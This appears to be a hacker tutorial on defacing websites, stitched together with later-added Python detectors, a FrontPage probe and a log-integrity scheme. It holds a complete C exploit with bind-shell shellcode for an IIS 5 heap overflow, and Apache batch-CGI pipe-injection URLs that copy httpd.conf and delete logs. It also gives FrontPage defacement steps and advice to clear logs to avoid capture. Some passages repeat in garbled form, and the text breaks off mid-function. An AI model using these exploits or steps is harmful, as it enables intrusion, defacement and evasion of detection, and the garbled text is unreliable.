To use the C code you must compile it (it is written for Microsoft Visual C++; the #pragma links Ws2_32.lib) and run it as exploit.exe <ip> <port> </file.asp>. What it does: the oversized chunked POST overflows a heap buffer in asp.dll on the Windows 2000 target, the overwritten pointers redirect execution into the NOP sled and shellcode carried in the request line, and the shellcode binds a shell to port 1111 on the target. Once the exploit works there is a shell listening on port 1111 of the target system; telnet to the target IP on port 1111 and you are connected to a command prompt without any kind of authentication.
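To make the request layout concrete, here is the same request rebuilt in Python with inert filler where the shellcode would be, a decoder for the chunked body, and a small detector that recognises the pattern in a captured request. This is an added example, not CHINANSL's code or anything from the original tutorial. The chunk layout, the pad bytes and the two addresses come from the exploit above; the detector's sled-length and target-length thresholds are my own assumptions.

```python
import struct

# Values taken from the exploit above; they are only meaningful for the build it targets.
SRCDATA = 0x01E2FB1C - 4
JMPADDR = 0x00457494
PAD = b"\xcc\xcc\xcc\xcc" b"ADPA" b"\x02\x02\x02\x02" b"PADP"   # the 16-byte "pad" string


def build_request(host, asp_path, uri_payload, srcdata=SRCDATA, jmpaddr=JMPADDR):
    """Rebuild the bytes the exploit's sprintf() and strstr() patching produce.

    uri_payload stands in for the 8 KB NOP sled plus shellcode that the exploit
    appends to the request target; pass inert bytes here.
    """
    body = (b"10\r\n" + PAD + b"\r\n"                               # 0x10 = 16-byte chunk
            + b"4\r\n" + struct.pack("<I", srcdata) + b"\r\n"       # replaces "AAAA"
            + b"4\r\n" + struct.pack("<I", jmpaddr) + b"\r\n"       # replaces "BBBB"
            + b"0\r\n\r\n\r\n")                                     # last chunk
    head = (b"POST " + asp_path + uri_payload + b" HTTP/1.1\r\n"
            + b"Accept: */*\r\n"
            + b"Host: " + host + b"\r\n"
            + b"Content-Type: application/x-www-form-urlencoded\r\n"
            + b"Transfer-Encoding: chunked\r\n\r\n")
    return head + body


def decode_chunked(body):
    """Split an HTTP/1.1 chunked body into its chunks; raises ValueError on bad framing."""
    chunks, pos = [], 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:
            raise ValueError("missing chunk-size line")
        size = int(body[pos:end].split(b";")[0], 16)   # chunk extensions are ignored
        pos = end + 2
        if size == 0:
            return chunks
        chunk = body[pos:pos + size]
        if len(chunk) != size or body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated chunk or missing CRLF")
        chunks.append(chunk)
        pos += size + 2


def split_request(raw):
    """Return (method, target, headers, body) for one raw HTTP request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def overflow_indicators(raw, sled_len=64, target_limit=1024):
    """Reasons a request looks like the IIS 5 .asp chunked-encoding attack above.

    An empty list means nothing matched. The thresholds are assumptions, not
    values from the tutorial.
    """
    method, target, headers, body = split_request(raw)
    reasons = []
    if method != b"POST" or headers.get(b"transfer-encoding", b"").lower() != b"chunked":
        return reasons
    if b".asp" not in target.lower():
        return reasons
    if len(target) > target_limit:
        reasons.append("request target longer than %d bytes" % target_limit)
    if b"\x90" * sled_len in target:
        reasons.append("NOP sled in request target")
    try:
        sizes = [len(c) for c in decode_chunked(body)]
    except ValueError:
        reasons.append("malformed chunked body")
        sizes = []
    if sizes == [16, 4, 4]:
        reasons.append("16/4/4 chunk layout (pad, srcdata, jmpaddr)")
    return reasons
```

The detector has to see the request itself, not the IIS log: the W3C log records the request target, so the 8 KB of NOPs does show up as an absurdly long cs-uri-stem, but neither the Transfer-Encoding header nor the 16/4/4 body is ever logged.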

Various Security Measures

Website defacement has become a serious problem for IT (Information Technology) based companies: every day thousands of websites are defaced. Even government websites are defaced, for different reasons; the most common is "cyber war". Just as rival countries fight wars in the real world, they fight them in the wired world too.

If you want to see the web attack archive, visit the following site:

http://defaced.alldas.org

Now some security measures for the system administrators:

- First of all, organize your web root into suitable directories: images in an image directory, server-side scripts in a directory of their own, and so on. The point is not tidiness but permissions: only the script directory (cgi-bin) should have execute permission, content directories should be read-only for the web server, and configuration files such as httpd.conf must never sit inside the web root. If you do not configure your web root properly, your web server will be prone to many attacks.

- You must be aware of the latest vulnerabilities; visit these sites:

http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com

Every web server has vulnerabilities, but you need not fear them: download and apply the latest patch for each vulnerability as soon as it is published.

The last thing is that you must be able to predict the moves of a malicious cracker or a script kiddie. You need to know how a cracker breaks into your site or web server and what the motive behind the attack is; you must think, act and work like a hacker, and take the cracker out at the root.

So this completes my tutorial on defacing websites. I hope you have understood the inner workings of web servers.

Edited by S433D_ONLY_LINUX and HACKFIRE TEAM


NOTE: The cgi-bin directory contains all the CGI and Perl scripts.

It is obvious that the cgi-bin virtual directory has execute permission, and that is the condition this attack exploits. When Apache on Windows serves a .bat file out of cgi-bin it does not run the batch file directly: it spawns a DOS (cmd.exe) shell to execute it and passes the query string to that shell on the command line. Because cmd.exe interprets the | (pipe) character, anything placed after a pipe in the query string is executed as a separate command on the remote server.

NOTE: If you do not know how to type the | (pipe) character, hold Shift and press the backslash key, which on most keyboards is just beside the Backspace key.

So the attack URL will be like this:

http://www.target.com/cgi-bin/test-cgi.bat?|copy+conf\httpd.conf+htdocs\httpd.conf

Through the above URL I have copied the httpd.conf file from the conf directory (the source and destination paths are relative to the directory the shell is started in, so they may need adjusting). The conf directory is outside the Apache web root, the htdocs folder, so it is not readable through the web server; once the file has been copied into htdocs we can download it with the following URL:

http://target.com/httpd.conf

Through this method you get the httpd.conf file, and from httpd.conf you can learn a lot about the web server: the DocumentRoot and ScriptAlias paths, which modules are loaded, which directories are password-protected and where the log files are written.
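As a worked example of what those requests leave behind, here is a small Python log scanner (added here, not part of the original tutorial) that parses Apache combined-format access-log lines, decodes the query string the way the CGI layer does, and reports every request that sends a cmd.exe operator such as | to a .bat or .cmd script in cgi-bin. The log lines are constructed for the example; they mirror the copy httpd.conf URL above and the DEL *.log URL from the log-clearing section, with documentation IP addresses.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache "combined" access-log lines for the example; not from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Feb/2006:04:18:45 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.23 - - [17/Feb/2006:04:19:02 +0000] "GET /cgi-bin/test-cgi.bat?|copy+conf\\httpd.conf+htdocs\\httpd.conf HTTP/1.0" 200 0 "-" "-"',
    '198.51.100.23 - - [17/Feb/2006:04:19:40 +0000] "GET /cgi-bin/test-cgi.bat?%7CDEL+*.log HTTP/1.0" 200 0 "-" "-"',
    '203.0.113.9 - - [17/Feb/2006:04:20:11 +0000] "GET /cgi-bin/search.cgi?q=a|b HTTP/1.1" 200 812 "-" "Mozilla/4.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)
BAT_CGI_RE = re.compile(r"^/cgi-bin/[^?]*\.(bat|cmd)$", re.IGNORECASE)
SHELL_METAS = ("|", "&", ">", "<")   # characters cmd.exe treats as operators


def parse_line(line):
    """Parse one combined-format line. The query string is decoded the way the
    CGI layer decodes it (%7C -> '|', '+' -> ' '), so encoding the pipe does not hide it."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec["target"].partition("?")
    rec["path"], rec["query"] = path, unquote_plus(query)
    return rec


def find_bat_cgi_injection(lines):
    """(ip, time, path, decoded query) for every request that passes a cmd.exe
    operator to a batch-file CGI through the query string."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if BAT_CGI_RE.match(rec["path"]) and any(c in rec["query"] for c in SHELL_METAS):
            hits.append((rec["ip"], rec["time"], rec["path"], rec["query"]))
    return hits


def source_ips(hits):
    """Distinct source addresses behind the hits, which is where tracing starts."""
    return sorted({h[0] for h in hits})
```

Both hits come from one address, which is exactly the trace the Keeping yourself safe section warns about. Note that the DEL *.log request is the last entry the attacker writes into the log before trying to delete it, and that the search.cgi line is not reported even though it contains a pipe, because only batch-file CGIs hand the query string to cmd.exe.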

Inspecting known vulnerabilities

Generally websites are defaced and hacked using vulnerabilities in the server software or in the operating system running the server software. Most "hackers" deface websites using vulnerabilities; please note that I am talking about hackers, not script kiddies, who deface websites using point-and-click tools. So you must know what a vulnerability is: a vulnerability is an existing flaw or defect in the software which allows a hacker or cracker to take control of the system or to issue arbitrary commands to the server. Every piece of software, application or tool has vulnerabilities.

http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com

The above sites carry the latest vulnerabilities together with exploit code. Even if you are elite or a professional, you will find the information useful.

Working with Exploits

I must say this is the most exciting part of this tutorial. Okay, so www.victim.com is the target site. Through the methods I explained earlier in the tutorial we have found out that the website is running on Microsoft IIS server software, so it is time to find a vulnerability. I am using the Acunetix Web Vulnerability Scanner to scan for vulnerabilities. You must know programming languages like Perl or C, and socket programming; this is essential because you will have to read, adapt and compile the exploits. Once you have found a vulnerability, try exploiting it; where the exploit is just a URL you can do that straight from your client (the browser).

MICROSOFT FRONTPAGE EXTENSION EXPLOIT

This is one of the methods for website defacement, using the Microsoft Web Publishing Wizard. It works against websites that run the FrontPage Server Extensions: with the Web Publishing Wizard one can replace pages on a FrontPage-extended web. Strictly speaking there is no exploit code here; the method works only where the web's authoring permissions are misconfigured so that an unauthenticated client is allowed to write. Otherwise the wizard prompts for a username and password.

Follow the steps given below:

Telnet to the target website or web server on port 80:

C:\> telnet www.victim.com 80

You will get a blank screen. Type GET and keep pressing Enter until the web server responds to your request:

GET <ENTER><ENTER>

NOTE: IIS on Windows 2000 Server comes with the FrontPage Server Extensions installed by default.

After pressing Enter you will get the following:

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Thu, 17 Feb 2006 04:18:45 GMT
Content-Type: text/html
Content-Length: 87

The Server header tells you the software and its version. Once you have the Bad Request reply you have to search for the homepage. Most sites use one of these default homepages:

http://www.victimserver.com/main.asp
http://www.victimserver.com/index.html
http://www.victimserver.com/index.htm
http://www.victimserver.com/index.asp
http://www.victimserver.com/main.htm
http://www.victimserver.com/default.htm
http://www.victimserver.com/default.asp
http://www.victimserver.com/default.html

Keep trying the possible names until the page loads; if a name does not exist the server returns a 404 error.

Let us say the homepage is www.victim.com/index.html. Design the page you want to upload, or modify the homepage, and save it as index.html.

Now open the Web Publishing Wizard and follow the steps given below:

- Open Microsoft Web Publishing Wizard.

- Browse to the file that you are going to upload. Here index.html is the file we are going to upload.

- You get a screen where you have to name the web server. Type in anything and click Advanced.

- Select the service provider from the drop-down box. This is nothing but the kind of upload it is going to do. Since your motive is to deface the site, select the FrontPage Extended Web option; this method of defacing works only for FrontPage-enabled sites.

- Type the URL of the victim server's homepage in the given box; here it is www.victim.com/index.html.

- Specify the URL that you type in the web browser to access the victim server's website.

- Select the connection method that you use to access the internet.

- Click Finish. Voila, you have replaced the victim's homepage with yours.
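The two checks above, the banner grab and the question of whether FrontPage authoring is open, can be automated. The following Python script is an added example, not part of the original tutorial or of any Microsoft tool: it sends the bare GET and reads the Server header, fetches _vti_inf.html (which every FPSE install publishes and which contains the FPVersion string), and then posts an "open service" call to _vti_bin/_vti_aut/author.dll. The exact body and headers of that probe are my assumption about the FrontPage RPC protocol; a 200 reply containing "vermeer RPC packet" without an authentication challenge means an anonymous client may author, which is exactly the condition the Web Publishing Wizard method needs. The network function is injected so the logic can be exercised against a stub.

```python
import socket


def http_exchange(host, port, request, timeout=5.0):
    """Send one raw HTTP request over TCP and return the raw reply (network I/O)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        parts = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            parts.append(data)
    return b"".join(parts)


def parse_response(raw):
    """Return (status code, headers dict with lower-case names, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    status = int(lines[0].split(b" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode(errors="replace")
    return status, headers, body


def get(path, host):
    return b"GET " + path + b" HTTP/1.0\r\nHost: " + host + b"\r\n\r\n"


# Paths every FrontPage Server Extensions install exposes.
FPSE_INFO = b"/_vti_inf.html"
FPSE_AUTHOR = b"/_vti_bin/_vti_aut/author.dll"
# Assumed probe: the "open service" RPC call a FrontPage client sends first (URL-encoded).
OPEN_SERVICE = b"method=open+service%3a4%2e0%2e2%2e2611&service%5fname=%2f"


def fpse_check(host, exchange):
    """Banner-grab the server and test whether FrontPage authoring is open to
    anonymous clients. exchange(request_bytes) -> response_bytes is injected so
    the check can run against a live host or a stub."""
    h = host.encode()
    _status, headers, _ = parse_response(exchange(get(b"/", h)))
    result = {"server": headers.get("server", ""), "fpse": False, "open_authoring": False}

    status, _, body = parse_response(exchange(get(FPSE_INFO, h)))
    if status != 200 or b"FPVersion" not in body:
        return result
    result["fpse"] = True

    req = (b"POST " + FPSE_AUTHOR + b" HTTP/1.0\r\nHost: " + h + b"\r\n"
           + b"Content-Type: application/x-www-form-urlencoded\r\n"
           + b"X-Vermeer-Content-Type: application/x-www-form-urlencoded\r\n"
           + b"Content-Length: " + str(len(OPEN_SERVICE)).encode() + b"\r\n\r\n"
           + OPEN_SERVICE)
    status, _, body = parse_response(exchange(req))
    # 200 with an RPC reply and no 401 challenge means anyone can author, i.e. deface.
    result["open_authoring"] = status == 200 and b"vermeer RPC packet" in body
    return result


def live_check(host, port=80):
    """Convenience wrapper for a real host (not exercised offline)."""
    return fpse_check(host, lambda req: http_exchange(host, port, req))
```

For an administrator the interesting field is open_authoring: if it is True for a production web, restrict the authoring permissions (or remove the extensions) before someone points the wizard at it.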

Overworking known vulnerabilities to break into a server

Before going deep into vulnerabilities you must know some exploit code. I am going to present an exploit written in the most powerful programming language, C.

/*
 Windows 2000 Server Exploit By CHINANSL Security Team
 Test on Windows 2000 Chinese Version, IIS 5.0, not patched.
 Warning: THIS PROGRAM WILL ONLY TEST!
 CHINANSL Technology CO.,LTD  http://www.chinansl.com
 keji@chinansl.com
 use MS VC++ to compile this piece of code
*/
/* Compile as C++ with Microsoft Visual C++. The original #include "stdafx.h"
   (MSVC precompiled header) has been dropped; nothing in the file depends on it. */
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment (lib,"Ws2_32")

int main(int argc, char* argv[])
{
    if(argc != 4)
    {
        printf("%s ip port aspfilepath\n\n",argv[0]);
        printf(" ie. %s 127.0.0.1 80 /iisstart.asp\n",argv[0]);
        puts(" programed by keji@chinansl.com");
        return 0;
    }

    /* Both values are specific to the Chinese Windows 2000 / IIS 5.0 build the authors
       tested on; the commented alternatives are the other candidates they tried.
       A wrong pair does not give a shell, it crashes the IIS process. */
    DWORD srcdata=0x01e2fb1c-4;   /* 0x00457474 */
    /* address of SHELLCODE */
    DWORD jmpaddr=0x00457494;     /* 0x77ebf094; 0x01e6fcec; "\x1c\xfb\xe6\x01"; "\x0c\xfb\xe6\x01" */

    char* destIP=argv[1];
    char* destFile=argv[3];
    int webport=atoi(argv[2]);
    char* pad="\xcc\xcc\xcc\xcc" "ADPA" "\x02\x02\x02\x02" "PADP";   /* 16 bytes */

    WSADATA ws;
    SOCKET s;
    long result=0;
    if(WSAStartup(0x0101,&ws) != 0)
    {
        puts("WSAStartup() error");
        return -1;
    }

    struct sockaddr_in addr;
    addr.sin_family=AF_INET;
    addr.sin_port=htons(webport);
    addr.sin_addr.s_addr=inet_addr(destIP);

    s=socket(AF_INET,SOCK_STREAM,0);
    if(s==INVALID_SOCKET)
    {
        puts("Socket create error");
        return -1;
    }

    if(connect(s,(struct sockaddr *)&addr,sizeof(addr)) == SOCKET_ERROR)
    {
        puts("Cannot connect to the specified host");
        return -1;
    }

    char buff[4096];
    /* Bind-shell payload. It loads kernel32/wsock32 through hard-coded kernel32
       addresses (another build dependency), listens on TCP port 1111 (0x0457 in
       network order: "\x66\xb8\x04\x57"), accepts one connection and starts cmd.exe
       with its standard handles redirected to pipes that are relayed to the socket. */
    char* shellcode=
    "\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33\xc9\x89"
    "\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65\x6c\x33\x32"
    "\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32\x2e\xab"
    "\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32\xc0\x4f"
    "\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53\xff\xd0\x89"
    "\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53\xff\xd0"
    "\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75\xfc\xff\xd3\x89"
    "\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6\x66\xbe"
    "\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\xbe\x3e\x02\x56"
    "\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56\xff\x75\xfc"
    "\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75\xfc\xff\xd3\x89"
    "\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\xfc\xff\xd3\x89"
    "\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\xfc\xff\xd3\x89"
    "\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45\xe0\x6a"
    "\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8\xff\xd3"
    "\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3\x89\x45"
    "\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13\xff\x75\xf8"
    "\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45\xc8\x6a"
    "\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
    "\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0\xab\xf7\xd0"
    "\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8\xab\x33\xc0"
    "\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50\xff\x55"
    "\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10"
    "\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff"
    "\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33"
    "\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50\xff\x55"
    "\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x94\x50"
    "\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0"
    "\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47"
    "\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c"
    "\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85\x38\xff"
    "\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x53\xff"
    "\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89"
    "\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50"
    "\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85"
    "\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\xff\xff\x50\x53"
    "\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x74\x6d"
    "\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff"
    "\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90"
    "\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0"
    "\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\xff\x55\xc8"
    "\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x8d\x85"
    "\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff"
    "\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4"
    "\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a"
    "\xff\xff\x95\x18\xff\xff\xff";

    char* s1="POST ";   /* " HTTP/1.1\r\n" is supplied by the format string below */
    char* s2="Accept: */*\r\n";
    char* s4="Content-Type: application/x-www-form-urlencoded\r\n";
    char* s5="Transfer-Encoding: chunked\r\n\r\n";
    char* sc="0\r\n\r\n\r\n";

    /* 8 KB of NOPs with the shellcode at the end; this goes into the request line
       right after the .asp path. */
    char shellcodebuff[1024*8];
    memset(shellcodebuff,0x90,sizeof(shellcodebuff));
    memcpy(&shellcodebuff[sizeof(shellcodebuff)-strlen(shellcode)-1],shellcode,strlen(shellcode));
    shellcodebuff[sizeof(shellcodebuff)-1] = 0;

    /* Chunked body: one 16-byte chunk (pad), then two 4-byte chunks that are
       patched below with srcdata and jmpaddr, then the terminating zero chunk. */
    char sendbuff[1024*16];
    memset(sendbuff,0,1024*16);
    sprintf(sendbuff,
            "%s%s%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s",
            s1,destFile,shellcodebuff,s2,destIP,s4,s5,pad,sc);
    int sendlen=strlen(sendbuff);
    *(DWORD*)strstr(sendbuff,"BBBB") = jmpaddr;
    *(DWORD*)strstr(sendbuff,"AAAA") = srcdata;

    result=send(s,sendbuff,sendlen,0);
    if(result == SOCKET_ERROR)
    {
        puts("Send shellcode error");
        return -1;
    }

    memset(buff,0,4096);
    result=recv(s,buff,sizeof(buff),0);
    /* A normal HTML reply means asp.dll served the request, i.e. the overflow did not hit. */
    if(strstr(buff,"<html>") != NULL)
    {
        shutdown(s,0);
        closesocket(s);
        puts("Send shellcode error!Try again!");
        return -1;
    }

    shutdown(s,0);
    closesocket(s);
    printf("\nUse <telnet %s 1111> to connect to the host\n",destIP);
    puts("If you cannot connect to the host,try run this program again!");
    return 0;
}

The above code is called an exploit. Exploits are written in powerful programming languages like C or Perl, and sometimes Java, and each one is written for one specific vulnerability. The vulnerabilities they target were discovered in the past, and nowadays server software and operating systems are usually patched against them, so you cannot just run an old exploit to break into a server: you must rework the exploit so that it fits the target, for example by replacing hard-coded values such as the srcdata and jmpaddr addresses above with ones valid for the target's build. One more thing I must mention is that you must keep yourself updated with the latest vulnerabilities by visiting the sites that I mentioned earlier in the tutorial. I think it is better that you code your own exploits in Perl or C in order to break into websites.

NOTE: I am talking about high-profile websites, not lame websites coded in Notepad.



puts(If you cannot connect to the hosttry run this program again)

return 0

The above code is what is called an exploit. Exploits are written in powerful programming languages like C, Perl or sometimes Java, and each one is written for a particular vulnerability. Vulnerabilities discovered in the past have since been patched in server software and operating systems, so you can't just execute an exploit to break into a server: you must rework the exploit code so that it works according to your needs. One more thing I must mention is that you must keep yourself updated with the latest vulnerabilities by visiting the sites I mentioned earlier in the tutorial. I think it is better that you write your own exploit code in Perl or C in order to break into websites.

NOTE: I am talking about high-profile websites, not lame websites coded in Notepad.

Keeping yourself safe

You must be familiar with server software like Apache, Microsoft IIS, etc., so you must know about the log files, which record each and every request made to the server. Since everything is recorded, system administrators will have no problem catching the malicious cracker or script kiddie: the log file holds the IP (Internet Protocol) address of every request, and through that IP address the cracker or script kiddie can be traced.

NOTE: Read my tutorial on Gathering Information of Remote Host.

TIP: If you do not want to get busted, you must clear the log files after you break into a web server.
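From the administrator's side, the point of the log is exactly why an intruder wants it gone, so the counter is to make deletion visible: chain each access-log line to the previous one with a keyed hash and forward the running tag off the host. The block below is an added example, not part of the tutorial; the key, the log lines and the addresses in them are constructed placeholders.

```python
import hashlib
import hmac
from typing import List, Optional, Tuple

# Placeholder key: keep the real key (or at least the forwarded tags) off the web server,
# otherwise whoever clears the log can simply re-seal it.
KEY = b"placeholder-secret-not-stored-on-the-web-server"

# Constructed sample access-log lines (Apache-style; addresses from documentation ranges).
SAMPLE_LINES = [
    '192.0.2.77 - - [17/Feb/2006:04:18:45 +0000] "GET / HTTP/1.1" 400 87',
    '192.0.2.77 - - [17/Feb/2006:04:19:02 +0000] "POST /iisstart.asp HTTP/1.1" 500 0',
    '198.51.100.5 - - [17/Feb/2006:04:19:30 +0000] "GET /index.html HTTP/1.1" 200 2048',
]

GENESIS = b"\x00" * 32   # the tag "before" the first line


def seal_line(key: bytes, prev_tag: bytes, line: str) -> bytes:
    """tag_i = HMAC-SHA256(key, tag_{i-1} || line_i): every tag commits to all earlier lines."""
    return hmac.new(key, prev_tag + line.encode("utf-8"), hashlib.sha256).digest()


def seal_log(key: bytes, lines: List[str]) -> List[Tuple[str, str]]:
    """Return (line, hex tag) pairs; the last tag is what gets forwarded to the collector."""
    tag = GENESIS
    sealed: List[Tuple[str, str]] = []
    for line in lines:
        tag = seal_line(key, tag, line)
        sealed.append((line, tag.hex()))
    return sealed


def verify_log(key: bytes, sealed: List[Tuple[str, str]],
               expected_last_tag: Optional[str] = None) -> Tuple[bool, Optional[int]]:
    """Recompute the chain. (True, None) if intact, else (False, index of the first bad line).
    Deleting or editing line i breaks every tag from i onward. Cutting lines off the end is
    only caught when the collector's copy of the last tag (expected_last_tag) is supplied."""
    tag = GENESIS
    for i, (line, tag_hex) in enumerate(sealed):
        tag = seal_line(key, tag, line)
        if not hmac.compare_digest(tag.hex(), tag_hex):
            return False, i
    if expected_last_tag is not None and not hmac.compare_digest(tag.hex(), expected_last_tag):
        return False, len(sealed)
    return True, None


if __name__ == "__main__":
    sealed = seal_log(KEY, SAMPLE_LINES)
    print("intact:      ", verify_log(KEY, sealed))
    print("line removed:", verify_log(KEY, [sealed[0]] + sealed[2:]))        # the POST line is gone
    print("truncated:   ", verify_log(KEY, sealed[:2], sealed[-1][1]))       # caught via forwarded tag
```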

CLEARING LOGS

You must clear the logs in order to save yourself from getting busted. You can use a cross-site scripting vulnerability to clear the log files; you can do so by requesting the following URL:

http://www.target.com/cgi-bin/test-cgi.bat|DEL+log

NOTE: The above URL applies to Apache server software.

In the case of IIS on Windows 2000 you can use the following method to get a DOS shell through telnet.

The code listed above, the Windows 2000 Server exploit by the CHINANSL Security Team (CHINANSL Technology CO., LTD, http://www.chinansl.com, keji@chinansl.com; tested by them on the Chinese version of Windows 2000 with an unpatched IIS 5.0, and marked "Warning: THIS PROGRAM WILL ONLY TEST"), exploits a buffer overflow in IIS 5 on Windows 2000 Server, opens port 1111 and binds a shell to it. If the exploit is successful, all you have to do is use telnet to connect to port 1111 of the target and the system is yours.

IMPLEMENTATION OF THE CODE

To use the C code you must compile it and run it. Now you must be wondering what the use of this code is. The C code causes an overflow in IIS on Windows 2000 and makes the system bind a shell to port 1111. So once the exploit works there will be a shell bound to port 1111 on the target system. To make use of it, telnet to the target IP on port 1111; through this you will be connected to the system without any kind of authentication.
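From the defender's side, the request this listing sends has a recognisable shape: a POST whose request-target runs to thousands of bytes of 0x90 NOPs and binary shellcode, Transfer-Encoding: chunked with a form-urlencoded Content-Type, and a body of one 16-byte chunk followed by two 4-byte chunks carrying addresses. The request inspector below is an added example, not part of the tutorial or of the CHINANSL code; the thresholds and the sample requests (which carry no shellcode) are constructed for it.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Thresholds are assumptions for this example; tune them per site.
MAX_TARGET_LEN = 2048                  # request-targets longer than this are suspicious on their own
NOP_RUN = re.compile(rb"\x90{32,}")    # 32+ consecutive 0x90 bytes is a NOP sled, not a URL
PRINTABLE = range(0x20, 0x7f)          # bytes a URL or a form-urlencoded body may contain


@dataclass
class Finding:
    rule: str
    detail: str


def parse_request(raw: bytes) -> Tuple[bytes, bytes, bytes, Dict[bytes, bytes], bytes]:
    """Split a raw HTTP/1.x request into (method, target, version, headers, body).
    The request-target stays raw bytes: that is where the listing puts its payload."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ", 2)
    if len(parts) != 3:
        raise ValueError("malformed request line")
    method, target, version = parts
    headers: Dict[bytes, bytes] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return method, target, version, headers, body


def parse_chunks(body: bytes) -> List[bytes]:
    """Decode a chunked body into its chunks, stopping at the zero-size chunk."""
    chunks: List[bytes] = []
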